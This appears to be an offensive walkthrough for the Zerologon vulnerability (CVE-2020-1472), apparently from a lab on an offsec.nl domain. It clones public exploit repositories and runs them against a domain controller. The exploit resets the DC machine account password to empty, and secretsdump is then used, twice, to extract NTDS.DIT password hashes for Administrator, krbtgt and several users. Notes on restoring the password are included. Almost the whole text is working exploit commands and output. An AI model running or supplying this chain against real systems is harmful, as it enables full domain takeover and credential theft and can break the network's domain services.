git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip install -r requirements.txt
$ python3 zerologon_tester.py DC2016 10.10.10.10
Performing authentication attempts...
=============================================================================
Success! DC can be fully compromised by a Zerologon attack.
Tip: for finding the DC's computer (NetBIOS) name, which the tester needs as its first argument, use: rdesktop -u '' IP (the name is shown on the logon screen)
git clone https://github.com/dirkjanm/CVE-2020-1472.git dirkjanm-CVE-2020-1472
cd dirkjanm-CVE-2020-1472
(cloned into its own directory here because both repositories are named CVE-2020-1472; needs the same Impacket dependency)
$ python3 cve-2020-1472-exploit.py DC2016 10.10.10.10
Performing authentication attempts...
=========================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
Dump using the 'no-pass' flag and the computer account (the exploit set the DC's machine account password in AD to the empty string). That also breaks the DC's own Netlogon secure channel and replication until the password is restored: the original survives in the DC's local LSA secrets ($MACHINE.ACC, printed by secretsdump.py as plain_password_hex when run against the DC with the Administrator hash and without -just-dc), and the dirkjanm repo ships restorepassword.py to write it back, e.g. restorepassword.py offsec.nl/DC2016@DC2016 -target-ip 10.10.10.10 -hexpass <hex> (domain name taken from the dump output).
$ secretsdump.py DC2016\$@10.10.10.10 -no-pass -just-dc
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[...]
[*] Cleaning up...
Or dump by passing the empty password's LM:NT hash pair explicitly (same result as -no-pass, since the exploit set the machine account password to the empty string)
$ secretsdump.py DC2016\$@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Impacket v0.9.22.dev1+20200914.162022.81d44893 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:102277341d6c113a28017200e1dfafe9:::
offsec.nl\johndo:1107:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\adm_johndo:1108:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\janedo:1110:aad3b435b51404eeaad3b435b51404ee:97f2592347d8fbe42be381726ff9ea83:::
offsec.nl\tokio:1111:aad3b435b51404eeaad3b435b51404ee:b5165f7ba9b2b1a41245a1e91c48b3a9:::
[..SNIP...]
[*] Cleaning up...